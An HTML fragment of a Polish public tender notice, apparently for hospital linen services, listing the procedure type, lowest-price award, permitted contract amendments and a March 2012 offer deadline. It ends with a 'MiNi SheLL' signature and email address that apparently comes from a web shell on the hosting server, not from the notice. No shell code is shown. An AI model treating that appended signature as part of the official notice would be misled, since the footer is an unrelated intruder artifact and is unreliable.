i. Ew. pełnomocnictwo lub upoważnienie do podpisania oferty (oryginał lub kopia poświadczona notarialnie), o ile sposób reprezentacji nie wynika z innych dokumentów załączonych przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególności dopuszcza się zmianę postanowień umowy w zakresie: 
- zmiany stawki podatku VAT z tym, iż zmiana taka obciąża Wykonawcę (wartość umowy brutto nie może ulec zmianie);
- zmian wynikających ze zmian przepisów prawnych związanych z umową zgodnie z terminem obowiązywania ww. przepisów;
- zmian osób upoważnionych do kontaktów od obu stron umowy;
- zmiany harmonogramu odbiorów i dostaw bielizny szpitalnej;
- zmian opakowań bielizny szpitalnej.
- zmiany terminu wykonania zamówienia (skrócenie terminu zamówienia w przypadku wykorzystania wartości umowy lub wydłużenie terminu zamówienia w przypadku nie wykorzystania wartości umowy w ciągu 36 miesięcy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ipzp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warszawa, ul. Inflancka 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 09:00, miejsce: Sekretariat w siedzibie Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com